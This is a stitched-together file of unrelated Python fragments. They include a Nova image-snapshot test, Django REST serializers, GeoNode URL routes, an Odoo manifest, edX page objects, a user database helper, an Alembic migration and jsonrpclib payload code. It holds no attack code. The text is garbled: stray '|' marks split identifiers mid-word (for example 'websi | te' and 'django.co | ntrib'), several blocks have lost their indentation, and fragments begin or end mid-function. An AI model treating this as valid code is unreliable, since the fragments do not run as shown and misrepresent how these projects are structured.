    :param extra_metadata: optional dict of extra image metadata to send
        with the createImage request.
    """
    def _fake_id(x):
        # Deterministic fake UUID built from a single character.
        return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
    body = dict(createImage=dict(name='snapshot_of_volume_backed'))
    if extra_metadata:
        body['createImage']['metadata'] = extra_metadata
    image_service = glance.get_default_image_service()

    def fake_block_device_mapping_get_all_by_instance(context, inst_id,
                                                      use_slave=False):
        return [fake_block_device.FakeDbBlockDeviceDict(
            {'volume_id': _fake_id('a'),
             'source_type': 'snapshot',
             'destination_type': 'volume',
             'volume_size': 1,
             'device_name': 'vda',
             'snapshot_id': 1,
             'boot_index': 0,
             'delete_on_termination': False,
             'no_device': None})]
    self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
                   fake_block_device_mapping_get_all_by_instance)
    # Empty image_ref: the instance is purely volume-backed here.
    instance = fakes.fake_instance_get(image_ref='',
                                       vm_state=vm_states.ACTIVE,
                                       root_device_name='/dev/vda')
    self.stubs.Set(db, 'instance_get_by_uuid', instance)
    fake_metadata = {'test_key1': 'test_value1',
                     'test_key2': 'test_value2'}
    volume = dict(id=_fake_id('a'),
                  size=1,
                  host='fake',
                  display_description='fake',
                  volume_image_metadata=fake_metadata)
    snapshot = dict(id=_fake_id('d'))
    self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
    volume_api = self.controller.compute_api.volume_api
    # Two get() expectations: the API fetches the volume twice in this path.
    volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
    volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
    volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
                                     mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
    req = fakes.HTTPRequest.blank(self.url)
    self.mox.ReplayAll()
    response = self.controller._action_create_image(req, FAKE_UUID, body)
    location = response.headers['Location']
    image_id = location.replace('http://localhost/v2/fake/images/', '')
    image = image_service.show(None, image_id)
    properties = image['properties']
    # Metadata copied over from the volume...
    self.assertEqual(properties['test_key1'], 'test_value1')
    self.assertEqual(properties['test_key2'], 'test_value2')
    # ...plus anything explicitly supplied in the request.
    if extra_metadata:
        for key, val in extra_metadata.items():
            self.assertEqual(properties[key], val)
def test_create_vol_backed_img_with | _meta_from_vol_without_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume()
def test_create_vol_backed_img_with_meta_from_vol_with_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume(
extra_metadata={'a': 'b'})
|
def test_create_image_snapshots_disabled(self):
"""Don't permit a snapshot if the allow_instance_snapshots flag is
False
"""
self.flags(allow_instance_snapshots=False)
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.co |
import json

from rest_framework import serializers
from taggit.models import Tag

from models import SurveyDraft
class WritableJSONField(serializers.Field):
    """Serializer for JSONField -- required to make the field writable.

    Also required because the default JSONField serialization includes the
    `u` prefix on strings when running Django 1.8, resulting in invalid
    JSON.

    (Fix: the second triple-quoted string in the original was a stray
    expression statement, not part of the docstring; both are merged here.)
    """

    def __init__(self, **kwargs):
        # `allow_blank` is not understood by serializers.Field, so pop it
        # before delegating to the parent constructor.
        self.allow_blank = kwargs.pop('allow_blank', False)
        super(WritableJSONField, self).__init__(**kwargs)

    def to_internal_value(self, data):
        """Parse the incoming JSON string into a Python value.

        Empty input on a non-required field deserializes to None.
        Raises serializers.ValidationError when the payload is not
        valid JSON.
        """
        if (not data) and (not self.required):
            return None
        try:
            return json.loads(data)
        except Exception as e:
            raise serializers.ValidationError(
                u'Unable to parse JSON: {}'.format(e))

    def to_representation(self, value):
        # The stored value is already JSON-serializable; pass it through.
        return value
class ListSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
    """Compact serializer used for survey-draft list views."""

    summary = WritableJSONField(required=False)

    class Meta:
        model = SurveyDraft
        fields = ('id', 'name', 'asset_type', 'summary', 'date_modified',
                  'description')
class DetailSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
    """Full serializer for a single survey draft, including its tags."""

    summary = WritableJSONField(required=False)
    tags = serializers.SerializerMethodField('get_tag_names')

    class Meta:
        model = SurveyDraft
        fields = ('id', 'name', 'body', 'summary', 'date_modified',
                  'description', 'tags')

    def get_tag_names(self, obj):
        """Return the names of the tags attached to this draft."""
        return obj.tags.names()
class TagSerializer(serializers.HyperlinkedModelSerializer):
    """Expose a tag's name (as `label`) together with its usage count."""

    count = serializers.SerializerMethodField()
    label = serializers.CharField(source='name')

    class Meta:
        model = Tag
        fields = ('id', 'label', 'count')

    def get_count(self, obj):
        """Number of the requesting user's question drafts carrying this tag."""
        request = self.context.get('request', None)
        queryset = SurveyDraft.objects.filter(tags__name__in=[obj.name])
        queryset = queryset.filter(user=request.user)
        queryset = queryset.filter(asset_type='question')
        return queryset.count()
from .util.deb import deb
from .util.nrange import nrange
from .cell import Cell
#F,e,Cursor
from .grid import spoint
# Module-level cursor position as an (x, y) tuple, or None when unset.
CURSOR_POS=None
def gcp(): #get cursor position
    """Return the current cursor position as an (x, y) tuple, or None."""
    # Fix: the `global` declaration was removed -- it is only needed for
    # assignment, not for reading CURSOR_POS.
    deb('gcp', CURSOR_POS)
    return CURSOR_POS
def scp(x, y):
    """Set the cursor position to (x, y)."""
    # Log the old position alongside the new one.
    deb('scp', gcp(), x, y)
    # Fix: removed the unused local `cxc` (dead code from an old TODO).
    global CURSOR_POS
    CURSOR_POS = (x, y)
    # Postcondition sanity check (note: stripped under `python -O`).
    assert (x, y) == gcp()
#todo cpget and c | pset
cpget=gcp
cpset=scp
def cursor(HG, x, y, f, X, Y):
    """Draw the four cursor glyphs into the cells surrounding (x, y).

    `f` holds the four glyph characters in left, up, right, down order.
    X and Y are accepted for interface compatibility with callers.
    """
    deb('make an a cursor in the empty space around point in cell x,y',x,y)
    assert len(f) == 4
    scp(x, y)
    # Build all four cells first, then place them (same order as before).
    left = Cell(f[0], 0, 0)
    up = Cell(f[1], 0, 0)
    right = Cell(f[2], 0, 0)
    down = Cell(f[3], 0, 0)
    HG = spoint(x - 1, y, HG, left)
    HG = spoint(x, y - 1, HG, up)
    HG = spoint(x + 1, y, HG, right)
    HG = spoint(x, y + 1, HG, down)
    return HG
def grid_cursor(HG,x,y,f,X,Y):
    """Thin wrapper around cursor(); kept for the grid-facing API name."""
    return cursor(HG,x,y,f,X,Y)
def _clearcursor(HG):
    """Erase the four cursor glyphs around the last recorded position.

    Returns HG unchanged when no cursor position has been set yet.
    """
    cp = gcp()
    deb('clear a cursor in the empty space around point in cell x,y', cp)
    if not cp:
        return HG
    i, j = cp
    # Fix: build the blank cell only after the early return, and use a
    # single Cell -- the original bound r1..r4 to one instance anyway.
    blank = Cell('.', 0, 0)
    HG = spoint(i - 1, j, HG, blank)
    HG = spoint(i, j - 1, HG, blank)
    HG = spoint(i + 1, j, HG, blank)
    HG = spoint(i, j + 1, HG, blank)
    return HG
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2012 OpenPlans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django.conf.urls.defaults import patterns, url
# Packages whose translations are served by Django's JavaScript i18n
# catalog view.
js_info_dict = {
    'packages': ('geonode.maps',),
}
urlpatterns = patterns('geonode.maps.views',
url(r'^$', 'map_list', name='maps_browse'),
url(r'^tag/(?P<slug>[-\w]+? | )/$', 'maps_tag', name='maps_browse_tag'),
url(r'^new$', 'new_map', name="new_map"),
url(r'^new/data$', 'new_map_json', name='new_map_json'),
url(r'^(?P<mapid>\d+)$', 'map_detail', name='map_detail'),
url(r'^(?P<mapid>\d+)/view$ | ', 'map_view', name='map_view'),
url(r'^(?P<mapid>\d+)/data$', 'map_json', name='map_json'),
url(r'^(?P<mapid>\d+)/download$', 'map_download', name='map_download'),
url(r'^(?P<mapid>\d+)/wmc$', 'map_wmc', name='map_wmc'),
url(r'^(?P<mapid>\d+)/remove$', 'map_remove', name='map_remove'),
url(r'^(?P<mapid>\d+)/metadata$', 'map_metadata', name='map_metadata'),
url(r'^(?P<mapid>\d+)/embed$', 'map_embed', name='map_embed'),
url(r'^(?P<mapid>\d+)/permissions$', 'map_permissions', name='map_permissions'),
url(r'^(?P<mapid>\d+)/thumbnail$', 'map_thumbnail', name='map_thumbnail'),
url(r'^check/$', 'map_download_check', name='map_download_check'),
url(r'^embed/$', 'map_embed', name='map_embed'),
url(r'^(?P<layername>[^/]*)/attributes', 'maplayer_attributes', name='maplayer_attributes'),
#url(r'^change-poc/(?P<ids>\w+)$', 'change_poc', name='maps_change_poc'),
)
|
# Copyright 2019-2020 Camptocamp SA
# Copyright 2015 Mathias Neef copadoMEDIA UG
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
"name": "Switzerland Country States",
"category": "Localisation",
"summary": "",
"version": "14.0.1.0.0",
"author": "copado MEDIA UG," "Odoo Community Associ | ation (OCA)",
"websi | te": "https://github.com/OCA/l10n-switzerland",
"license": "AGPL-3",
"depends": ["base"],
"data": ["data/res_country_states.xml"],
}
|
le
def bookmark_button_visible(self):
""" Check if bookmark button is visible """
EmptyPromise(lambda: self.q(css='.bookmark-button').visible, "Bookmark button visible").fulfill()
return True
@property
def bookmark_button_state(self):
""" Return `bookmarked` if button is in bookmarked state else '' """
return 'bookmarked' if self.q(css='.bookmark-button.bookmarked').present else ''
@property
def bookmark_icon_visible(self):
""" Check if bookmark icon is visible on active sequence nav item """
return self.q(css='.active .bookmark-icon').visible
def click_bookmark_unit_button(self):
""" Bookmark a unit by clicking on Bookmark button """
previous_state = self.bookmark_button_state
self.q(css | ='.bookmark-button').first.click()
EmptyPromise(lambda: self.bookmark_button_state != previous_state, "Bookmark button toggled").fulfill()
# TODO: TNL-6546: Remove this helper function
def click_bookmarks_button(self):
""" Click on Bookmarks button """
self.q(css='.bookmarks-list-button').first.click()
bookmarks_page = BookmarksPage(self.browser, self.course_id)
bookm | arks_page.visit()
class CoursewareSequentialTabPage(CoursePage):
    """
    Courseware Sequential page
    """

    def __init__(self, browser, course_id, chapter, subsection, position):
        super(CoursewareSequentialTabPage, self).__init__(browser, course_id)
        self.url_path = "courseware/{}/{}/{}".format(
            chapter, subsection, position)

    def is_browser_on_page(self):
        # The sequence nav wrapper only renders on sequential pages.
        return self.q(css='nav.sequence-list-wrapper').present

    def get_selected_tab_content(self):
        """
        return the body of the sequential currently selected
        """
        selected = self.q(css='#seq_content .xblock')
        return selected.text[0]
class CourseNavPage(PageObject):
"""
Handles navigation on the courseware pages, including sequence navigation and
breadcrumbs.
"""
    # This page is reached by navigation, never by direct URL.
    url = None

    def __init__(self, browser, parent_page):
        super(CourseNavPage, self).__init__(browser)
        self.parent_page = parent_page
        # TODO: TNL-6546: Remove the following
        self.unified_course_view = False
    def is_browser_on_page(self):
        # NOTE(review): `is_browser_on_page` is returned without being
        # called; if the parent page defines it as a method (not a
        # property) this is always truthy -- confirm intended.
        return self.parent_page.is_browser_on_page
# TODO: TNL-6546: Remove method, outline no longer on courseware page
@property
def sections(self):
"""
Return a dictionary representation of sections and subsections.
Example:
{
'Introduction': ['Course Overview'],
'Week 1': ['Lesson 1', 'Lesson 2', 'Homework']
'Final Exam': ['Final Exam']
}
You can use these titles in `go_to_section` to navigate to the section.
"""
# Dict to store the result
nav_dict = dict()
section_titles = self._section_titles()
# Get the section titles for each chapter
for sec_index, sec_title in enumerate(section_titles):
if len(section_titles) < 1:
self.warning("Could not find subsections for '{0}'".format(sec_title))
else:
# Add one to convert list index (starts at 0) to CSS index (starts at 1)
nav_dict[sec_title] = self._subsection_titles(sec_index + 1)
return nav_dict
@property
def sequence_items(self):
"""
Return a list of sequence items on the page.
Sequence items are one level below subsections in the course nav.
Example return value:
['Chemical Bonds Video', 'Practice Problems', 'Homework']
"""
seq_css = 'ol#sequence-list>li>.nav-item>.sequence-tooltip'
return self.q(css=seq_css).map(self._clean_seq_titles).results
    # TODO: TNL-6546: Remove method, outline no longer on courseware page
    def go_to_section(self, section_title, subsection_title):
        """
        Go to the section in the courseware.
        Every section must have at least one subsection, so specify
        both the section and subsection title.

        :param section_title: display title of the chapter to open
        :param subsection_title: display title of the subsection to open

        Logs a warning and returns without navigating when either title
        cannot be found.

        Example:
            go_to_section("Week 1", "Lesson 1")
        """
        # For test stability, disable JQuery animations (opening / closing menus)
        self.browser.execute_script("jQuery.fx.off = true;")
        # Get the section by index
        try:
            sec_index = self._section_titles().index(section_title)
        except ValueError:
            self.warning("Could not find section '{0}'".format(section_title))
            return
        # Click the section to ensure it's open (no harm in clicking twice if it's already open)
        # Add one to convert from list index to CSS index
        section_css = '.course-navigation .chapter:nth-of-type({0})'.format(sec_index + 1)
        self.q(css=section_css).first.click()
        # Get the subsection by index
        try:
            subsec_index = self._subsection_titles(sec_index + 1).index(subsection_title)
        except ValueError:
            msg = "Could not find subsection '{0}' in section '{1}'".format(subsection_title, section_title)
            self.warning(msg)
            return
        # Convert list indices (start at zero) to CSS indices (start at 1)
        subsection_css = (
            ".course-navigation .chapter-content-container:nth-of-type({0}) "
            ".menu-item:nth-of-type({1})"
        ).format(sec_index + 1, subsec_index + 1)
        # Click the subsection and ensure that the page finishes reloading
        self.q(css=subsection_css).first.click()
        self._on_section_promise(section_title, subsection_title).fulfill()
def go_to_vertical(self, vertical_title):
"""
Within a section/subsection, navigate to the vertical with `vertical_title`.
"""
# Get the index of the item in the sequence
all_items = self.sequence_items
try:
seq_index = all_items.index(vertical_title)
except ValueError:
msg = "Could not find sequential '{0}'. Available sequentials: [{1}]".format(
vertical_title, ", ".join(all_items)
)
self.warning(msg)
else:
# Click on the sequence item at the correct index
# Convert the list index (starts at 0) to a CSS index (starts at 1)
seq_css = "ol#sequence-list>li:nth-of-type({0})>.nav-item".format(seq_index + 1)
self.q(css=seq_css).first.click()
# Click triggers an ajax event
self.wait_for_ajax()
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _section_titles(self):
"""
Return a list of all section titles on the page.
"""
chapter_css = '.course-navigation .chapter .group-heading'
return self.q(css=chapter_css).map(lambda el: el.text.strip()).results
    # TODO: TNL-6546: Remove method, outline no longer on courseware page
    def _subsection_titles(self, section_index):
        """
        Return a list of all subsection titles on the page
        for the section at index `section_index` (starts at 1).

        :param section_index: 1-based CSS index of the chapter container.
        """
        # Retrieve the subsection title for the section
        # Add one to the list index to get the CSS index, which starts at one
        subsection_css = (
            ".course-navigation .chapter-content-container:nth-of-type({0}) "
            ".menu-item a p:nth-of-type(1)"
        ).format(section_index)
        # If the element is visible, we can get its text directly
        # Otherwise, we need to get the HTML
        # It *would* make sense to always get the HTML, but unfortunately
        # the open tab has some child <span> tags that we don't want.
        return self.q(
            css=subsection_css
        ).map(
            lambda el: el.text.strip().split('\n')[0] if el.is_displayed() else el.get_attribute('innerHTML').strip()
        ).results
# TODO: TNL-6546: Remove method, outline no longer on courseware page
def _on_section_promise(self, section_title, subsection_title):
"""
Return a `Promise` that is ful |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
db manages interactions with the underlying database
"""
import logging
import random
from sqlalchemy import create_engine, MetaData, Table, Column, String, Date, LargeBinary
from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor
class UserDb:
    """
    UserDb provides a set of helper functions over SQLAlchemy
    to handle db operations for userservice
    """

    def __init__(self, uri, logger=logging):
        """Create the engine, define the users table and enable tracing.

        Params: uri - SQLAlchemy database connection URI
                logger - logger to use (defaults to the logging module)
        """
        self.engine = create_engine(uri)
        self.logger = logger
        self.users_table = Table(
            'users',
            MetaData(self.engine),
            Column('accountid', String, primary_key=True),
            Column('username', String, unique=True, nullable=False),
            Column('passhash', LargeBinary, nullable=False),
            Column('firstname', String, nullable=False),
            Column('lastname', String, nullable=False),
            Column('birthday', Date, nullable=False),
            Column('timezone', String, nullable=False),
            Column('address', String, nullable=False),
            Column('state', String, nullable=False),
            Column('zip', String, nullable=False),
            Column('ssn', String, nullable=False),
        )

        # Set up tracing autoinstrumentation for sqlalchemy
        SQLAlchemyInstrumentor().instrument(
            engine=self.engine,
            service='users',
        )

    def add_user(self, user):
        """Add a user to the database.

        Params: user - a key/value dict of attributes describing a new user
                       {'username': username, 'password': password, ...}
        Raises: SQLAlchemyError if there was an issue with the database
        """
        statement = self.users_table.insert().values(user)
        self.logger.debug('QUERY: %s', str(statement))
        with self.engine.connect() as conn:
            conn.execute(statement)

    def generate_accountid(self):
        """Generates a globally unique alphanumerical accountid.

        Returns a 10-digit numeric string not yet present in the users
        table.
        """
        self.logger.debug('Generating an account ID')
        accountid = None
        with self.engine.connect() as conn:
            while accountid is None:
                # Fix: use integer bounds -- float arguments to randint
                # (1e9, 1e10 - 1) raise TypeError on Python >= 3.12.
                accountid = str(random.randint(10 ** 9, 10 ** 10 - 1))
                statement = self.users_table.select().where(
                    self.users_table.c.accountid == accountid
                )
                self.logger.debug('QUERY: %s', str(statement))
                result = conn.execute(statement).first()
                # If there already exists an account, try again.
                # NOTE(review): check-then-generate is racy across
                # processes; the accountid primary key is the backstop.
                if result is not None:
                    accountid = None
                    self.logger.debug(
                        'RESULT: account ID already exists. Trying again')
        self.logger.debug('RESULT: account ID generated.')
        return accountid

    def get_user(self, username):
        """Get user data for the specified username.

        Params: username - the username of the user
        Return: a key/value dict of user attributes,
                {'username': username, 'accountid': accountid, ...}
                or None if that user does not exist
        Raises: SQLAlchemyError if there was an issue with the database
        """
        statement = self.users_table.select().where(
            self.users_table.c.username == username)
        self.logger.debug('QUERY: %s', str(statement))
        with self.engine.connect() as conn:
            result = conn.execute(statement).first()
        self.logger.debug('RESULT: fetched user data for %s', username)
        return dict(result) if result is not None else None
|
# Copyright 2021 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add device reservation
Revision ID: 42c7fd6e792e
Revises: 02e2f2186d98
Create Date: 2021-06-22 15:27:00.239725
"""
# revision identifiers, used by Alembic.
revision = '42c7fd6e792e'       # this migration
down_revision = '02e2f2186d98'  # previous migration in the chain
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
def upgrade():
    """Create the device reservation tables and tighten instance affinity.

    Tables are created parent-first (devices before the tables holding
    foreign keys into it).
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('devices',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('name', sa.String(length=255), nullable=False),
                    sa.Column('device_type',
                              sa.Enum('container', 'vm', 'shell',
                                      name='allowed_device_types'),
                              nullable=False),
                    sa.Column('device_driver', sa.Enum(
                        'zun', name='allowed_device_drivers'), nullable=False),
                    sa.Column('reservable', sa.Boolean(),
                              server_default=sa.text('true'), nullable=False),
                    sa.PrimaryKeyConstraint('id')
                    )
    op.create_table('device_extra_capabilities',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('device_id', sa.String(
                        length=36), nullable=False),
                    sa.Column('capability_id', sa.String(
                        length=255), nullable=False),
                    sa.Column('capability_value', sa.Text().with_variant(
                        mysql.MEDIUMTEXT(), 'mysql'), nullable=False),
                    sa.ForeignKeyConstraint(
                        ['capability_id'], ['extra_capabilities.id'], ),
                    sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
                    sa.PrimaryKeyConstraint('id')
                    )
    op.create_table('device_allocations',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted', sa.String(length=36), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('device_id', sa.String(
                        length=36), nullable=True),
                    sa.Column('reservation_id', sa.String(
                        length=36), nullable=True),
                    sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),
                    sa.ForeignKeyConstraint(['reservation_id'], [
                        'reservations.id'], ),
                    sa.PrimaryKeyConstraint('id')
                    )
    op.create_table('device_reservations',
                    sa.Column('created_at', sa.DateTime(), nullable=True),
                    sa.Column('updated_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted_at', sa.DateTime(), nullable=True),
                    sa.Column('deleted', sa.String(length=36), nullable=True),
                    sa.Column('id', sa.String(length=36), nullable=False),
                    sa.Column('reservation_id', sa.String(
                        length=36), nullable=True),
                    sa.Column('count_range', sa.String(
                        length=36), nullable=True),
                    sa.Column('resource_properties', sa.Text().with_variant(
                        mysql.MEDIUMTEXT(), 'mysql'), nullable=True),
                    sa.Column('before_end', sa.String(
                        length=36), nullable=True),
                    sa.ForeignKeyConstraint(['reservation_id'], [
                        'reservations.id'], ),
                    sa.PrimaryKeyConstraint('id')
                    )
    # Affinity is now mandatory on instance reservations.
    op.alter_column('instance_reservations', 'affinity',
                    existing_type=mysql.TINYINT(display_width=1),
                    nullable=False)
    # ### end Alembic commands ###
def downgrade():
    """Revert the device reservation schema changes."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.alter_column('instance_reservations', 'affinity',
                    existing_type=mysql.TINYINT(display_width=1),
                    nullable=True)
    # Drop child tables before their parents to satisfy FK constraints
    # (same order as the original explicit drops).
    for table_name in ('device_reservations',
                       'device_allocations',
                       'device_extra_capabilities',
                       'devices'):
        op.drop_table(table_name)
    # ### end Alembic commands ###
|
from django.conf.urls import patterns, include, url
from django.co | ntrib import admin
from api import views
admin.autodiscover()
from res | t_framework.routers import DefaultRouter
# The router auto-generates list/detail routes for the registered viewsets.
router = DefaultRouter()
router.register(r'headings', views.HeadingViewSet)
router.register(r'users', views.UserViewSet)
urlpatterns = patterns('',
    url(r'^', include(router.urls)),
    # Login/logout views for the browsable API.
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
)
if self.version >= 2:
del error["result"]
else:
error["result"] = None
error["error"] = {"code": code, "message": message}
if data is not None:
error["error"]["data"] = data
return error
# ------------------------------------------------------------------------------
def dump(
    params=None,
    methodname=None,
    rpcid=None,
    version=None,
    is_response=None,
    is_notify=None,
    config=jsonrpclib.config.DEFAULT,
):
    """
    Prepares a JSON-RPC dictionary (request, notification, response or error)

    :param params: Method parameters (if a method name is given) or a Fault
    :param methodname: Method name
    :param rpcid: Request ID
    :param version: JSON-RPC version
    :param is_response: If True, this is a response dictionary
    :param is_notify: If True, this is a notification request
    :param config: A JSONRPClib Config instance
    :return: A JSON-RPC dictionary
    :raise TypeError: Invalid method parameters
    :raise ValueError: Not a request and not a response
    """
    # Default version
    if not version:
        version = config.version
    if not is_response and params is None:
        params = []
    # Validate method name and parameters
    valid_params = [utils.TupleType, utils.ListType, utils.DictType, Fault]
    if is_response:
        # A response may legitimately carry a None result
        valid_params.append(type(None))
    # Fix: the original used a triple-quoted string here as a "comment",
    # which is actually a discarded expression statement, not a comment.
    # If a method is given and params are not list-ish or a Fault, error out.
    if isinstance(methodname, utils.STRING_TYPES) and not isinstance(
        params, tuple(valid_params)
    ):
        raise TypeError(
            "Params must be a dict, list, tuple " "or Fault instance."
        )
    # Prepares the JSON-RPC content
    payload = Payload(rpcid=rpcid, version=version)
    if isinstance(params, Fault):
        # Prepare an error dictionary
        # pylint: disable=E1103
        return payload.error(params.faultCode, params.faultString, params.data)
    if not isinstance(methodname, utils.STRING_TYPES) and not is_response:
        # Neither a request nor a response
        raise ValueError(
            "Method name must be a string, or is_response "
            "must be set to True."
        )
    if config.use_jsonclass:
        # Use jsonclass to convert the parameters
        params = jsonclass.dump(params, config=config)
    if is_response:
        # Prepare a response dictionary
        if rpcid is None:
            # A response must have a request ID
            raise ValueError("A method response must have an rpcid.")
        return payload.response(params)
    if is_notify:
        # Prepare a notification dictionary
        return payload.notify(methodname, params)
    else:
        # Prepare a method call dictionary
        return payload.request(methodname, params)
def dumps(
    params=None,
    methodname=None,
    methodresponse=None,
    encoding=None,
    rpcid=None,
    version=None,
    notify=None,
    config=jsonrpclib.config.DEFAULT,
):
    """
    Prepares a JSON-RPC request/response string

    :param params: Method parameters (if a method name is given) or a Fault
    :param methodname: Method name
    :param methodresponse: If True, this is a response dictionary
    :param encoding: Result string encoding
    :param rpcid: Request ID
    :param version: JSON-RPC version
    :param notify: If True, this is a notification request
    :param config: A JSONRPClib Config instance
    :return: A JSON-RPC dictionary
    """
    # Build the JSON-RPC dictionary, then serialize it as a JSON string.
    request = dump(
        params,
        methodname,
        rpcid,
        version,
        methodresponse,
        notify,
        config,
    )
    return jdumps(request, encoding=encoding or "UTF-8")
def load(data, config=jsonrpclib.config.DEFAULT):
    """
    Loads a JSON-RPC request/response dictionary. Calls jsonclass to load beans

    :param data: A JSON-RPC dictionary
    :param config: A JSONRPClib Config instance (or None for default values)
    :return: A parsed dictionary or None
    """
    if data is None:
        # Notification: nothing to parse
        return None
    # if the above raises an error, the implementing server code
    # should return something like the following:
    # { 'jsonrpc':'2.0', 'error': fault.error(), id: None }
    if not config.use_jsonclass:
        return data
    # Convert beans back into Python objects
    return jsonclass.load(data, config.classes)
def loads(data, config=jsonrpclib.config.DEFAULT):
    """
    Loads a JSON-RPC request/response string. Calls jsonclass to load beans

    :param data: A JSON-RPC string
    :param config: A JSONRPClib Config instance (or None for default values)
    :return: A parsed dictionary or None
    """
    if data == "":
        # Notification
        return None
    # Parse the JSON dictionary, then load the beans
    return load(jloads(data), config)
# ------------------------------------------------------------------------------
def check_for_errors(result):
    """
    Checks if a result dictionary signals an error

    :param result: A result dictionary
    :raise TypeError: Invalid parameter
    :raise NotImplementedError: Unknown JSON-RPC version
    :raise ValueError: Invalid dictionary content
    :raise ProtocolError: An error occurred on the server side
    :return: The result parameter
    """
    if not result:
        # Notification
        return result
    if not isinstance(result, utils.DictType):
        # Invalid argument
        raise TypeError("Response is not a dict.")
    if "jsonrpc" in result and float(result["jsonrpc"]) > 2.0:
        # Unknown JSON-RPC version
        raise NotImplementedError("JSON-RPC version not yet supported.")
    if "result" not in result and "error" not in result:
        # Invalid dictionary content
        raise ValueError("Response does not have a result or error key.")
    if "error" in result and result["error"]:
        # Server-side error
        if "code" in result["error"]:
            # Code + Message
            code = result["error"]["code"]
            try:
                # Get the message (jsonrpclib)
                message = result["error"]["message"]
            except KeyError:
                # Get the trace (jabsorb)
                message = result["error"].get("trace", "<no error message>")
            if -32700 <= code <= -32000:
                # Pre-defined errors
                # See http://www.jsonrpc.org/specification#error_object
                raise ProtocolError((code, message))
            else:
                # Application error
                data = result["error"].get("data", None)
                raise AppError((code, message, data))
        elif isinstance(result["error"], dict) and len(result["error"]) == 1:
            # Error with a single entry ('reason', ...): use its content
            # Fix: dict.keys() is not subscriptable on Python 3; use
            # next(iter(...)), which works on both Python 2 and 3.
            error_key = next(iter(result["error"]))
            raise ProtocolError(result["error"][error_key])
        else:
            # Use the raw error content
            raise ProtocolError(result["error"])
    return result
def isbatch(request):
    """
    Tests if the given request is a batch call, i.e. a list of multiple calls
    :param request: a JSON-RPC request object
    :return: True if the request is a batch call
    """
    if not isinstance(request, (utils.ListType, utils.TupleType)):
        # Not a list: not a batch call
        return False
    elif len(request) < 1:
        # An empty list: not a batch call
        # (the previous comment said "Only one request", but this branch
        # only triggers for an empty sequence)
        return False
    elif not isinstance(request[0], utils.DictType):
        # One of the requests is not a dictionary, i.e. a JSON Object
        # therefore it is not a valid JSON-RPC request
        return False
    elif "jsonrpc" not in request[0].keys():
        # No "jsonrpc" version in the JSON object: not a request
        return False
    try:
        version = float(request[0]["jsonrpc"])
    except ValueError:
        # Bad version of JSON-RPC
        raise ProtocolError('"jsonrpc" key must be a float(able) value.')
    if version < 2:
        # Batch call were not supported before JSON-RPC 2.0
        return False
    return True
def isnotification(request):
"""
Tests if the given request is a notification
:param req |
# ####################################################################
# gofed - set of tools to automize packaging of golang devel codes
# Copyright (C) 2014 Jan Chaloupka, jchaloup@redhat.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ####################################################################
###################################################################
# TODO:
# [ ] - detect more import paths/sources in spec file?
